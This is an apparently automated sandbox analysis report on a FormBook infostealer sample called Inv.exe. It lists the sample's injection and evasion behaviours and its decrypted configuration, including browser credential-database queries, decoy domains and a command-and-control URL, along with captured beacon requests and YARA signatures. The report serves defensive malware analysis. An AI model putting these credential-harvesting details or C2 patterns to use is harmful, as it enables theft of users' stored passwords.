Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Inv.exe

Overview

General Information

Sample Name:Inv.exe
Analysis ID:339347
MD5:a3aba7d40da6c8c86e4e8d035803f314
SHA1:469b36f05939d6ec6457f1b72ba9f6c7a960be06
SHA256:1f94eb81e3cde4f677fd210e1ff7f5d06987cbdc2fa7de79e28b224e49244b40
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Inv.exe (PID: 1848 cmdline: 'C:\Users\user\Desktop\Inv.exe' MD5: A3ABA7D40DA6C8C86E4E8D035803F314)
    • Inv.exe (PID: 4700 cmdline: 'C:\Users\user\Desktop\Inv.exe' MD5: A3ABA7D40DA6C8C86E4E8D035803F314)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 6448 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • NETSTAT.EXE (PID: 6460 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 6740 cmdline: /c del 'C:\Users\user\Desktop\Inv.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc3", "KEY1_OFFSET 0x1d6f3", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1d7ed", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1c373", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xb201d05d", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715030", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012164", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd015d1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "apartmentsineverettwa.com", "forritcu.net", "hotroodes.com", "skinnerttc.com", "royaltrustmyanmar.com", "adreslog.com", "kaysbridalboutiques.com", "multitask-improvements.com", "geniiforum.com", "smarthomehatinh.asia", "banglikeaboss.com", "javlover.club", "affiliateclubindia.com", "mycapecoralhomevalue.com", "comparamuebles.online", "newrochellenissan.com", "nairobi-paris.com", "fwk.xyz", "downdepot.com", "nextgenmemorabilia.com", "achonabu.com", "stevebana.xyz", "jacmkt.com", "weownthenight187.com", "divshop.pro", "wewearceylon.com", "skyreadymix.net", "jaffacorner.com", "bakerlibra.icu", "femalecoliving.com", "best20banks.com", "millcityloam.com", "signature-office.com", "qlifepharmacy.com", "dextermind.net", "fittcycleacademy.com", "davidoff.sucks", "1033393.com", "tutorsboulder.com", "bonicc.com", "goodberryjuice.com", "zhaowulu.com", "teryaq.media", "a-zsolutionsllc.com", "bitcoincandy.xyz", "cfmfair.com", "annefontain.com", "princesssexyluxwear.com", "prodigybrushes.com", "zzhqp.com", "hwcailing.com", "translatiions.com", "azery.site", "wy1917.com", "ringohouse.info", "chartershome.com", "thongtinhay.net", "2201virginiacondo5.com", "laurieryork.net", "mujeresnegociantes.com", "anchoriaswimwear.com", "michaelsala.com", "esdeportebici.com", "ninjitsoo.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.nationshiphop.com/hko6/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18419:$sqlite3step: 68 34 1C 7B E1
    • 0x1852c:$sqlite3step: 68 34 1C 7B E1
    • 0x18448:$sqlite3text: 68 38 2A 90 C5
    • 0x1856d:$sqlite3text: 68 38 2A 90 C5
    • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.Inv.exe.d90000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.Inv.exe.d90000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.Inv.exe.d90000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18419:$sqlite3step: 68 34 1C 7B E1
        • 0x1852c:$sqlite3step: 68 34 1C 7B E1
        • 0x18448:$sqlite3text: 68 38 2A 90 C5
        • 0x1856d:$sqlite3text: 68 38 2A 90 C5
        • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
        0.2.Inv.exe.d90000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.Inv.exe.d90000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: Inv.exeAvira: detected
          Found malware configurationShow sources
          Source: 0.2.Inv.exe.d90000.1.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc3", "KEY1_OFFSET 0x1d6f3", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1d7ed", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1c373", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xb201d05d", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715030", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012164", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd015d1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
          Multi AV Scanner detection for submitted fileShow sources
          Source: Inv.exeVirustotal: Detection: 39%Perma Link
          Source: Inv.exeReversingLabs: Detection: 45%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Inv.exeJoe Sandbox ML: detected
          Source: 0.2.Inv.exe.d90000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.Inv.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Inv.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Inv.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Inv.exe, 00000000.00000003.670292202.000000001A590000.00000004.00000001.sdmp, Inv.exe, 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Inv.exe, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Inv.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\Inv.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\Inv.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\Inv.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi

          Networking:

          barindex
          Uses netstat to query active network connections and open portsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=9ExSQ4NEk+xqeDwz7kz53SpWI5tzJaWW64EQQFdVNavty5IFfZu+ty07sGNE8SwhRq/4 HTTP/1.1Host: www.millcityloam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=Ds6mycG6XVC6cOnx6IQpHboGdSODTK5baT5OF1Gnzp/H9CBW+9tUucbuBNfXcxevyFer HTTP/1.1Host: www.achonabu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p HTTP/1.1Host: www.a-zsolutionsllc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJP HTTP/1.1Host: www.nationshiphop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.54.117.217 198.54.117.217
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: Joe Sandbox ViewASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
          Source: global trafficHTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=9ExSQ4NEk+xqeDwz7kz53SpWI5tzJaWW64EQQFdVNavty5IFfZu+ty07sGNE8SwhRq/4 HTTP/1.1Host: www.millcityloam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=Ds6mycG6XVC6cOnx6IQpHboGdSODTK5baT5OF1Gnzp/H9CBW+9tUucbuBNfXcxevyFer HTTP/1.1Host: www.achonabu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p HTTP/1.1Host: www.a-zsolutionsllc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJP HTTP/1.1Host: www.nationshiphop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.millcityloam.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeX-Powered-By: PHP/5.6.40Content-Type: text/html; charset=UTF-8X-UA-Compatible: IE=edgeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://abccarpetcare.com/wp-json/>; rel="https://api.w.org/"X-LiteSpeed-Cache-Control: public,max-age=3600X-LiteSpeed-Tag: 2cd_404,2cd_URL.8baa36f0385195f985698a5c3d8ac84b,2cd_ERR.404,2cd_X-Litespeed-Cache: missTransfer-Encoding: chunkedDate: Wed, 13 Jan 2021 20:27:17 GMTServer: LiteSpeedData Raw: 34 35 37 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 62 63 63 61 72 70 65 74 63 61 72 65 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 41 42 43 20 43 61 72 70 65 74 20 43 61 72 65 20 26 23 38 32 31 31 3b 20 41 42 43 20 52 75 67 20 43 6c 65 61 6e 69 6e 67 20 4e 59 43 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 54 6f 74 61 6c 20 57 6f 72 64 50 72 65 73 73 20 54 68 65 6d 65 20 33 2e 36 2e 30 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 62 63 63 61 72 70 65 74 63 61 72 65 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 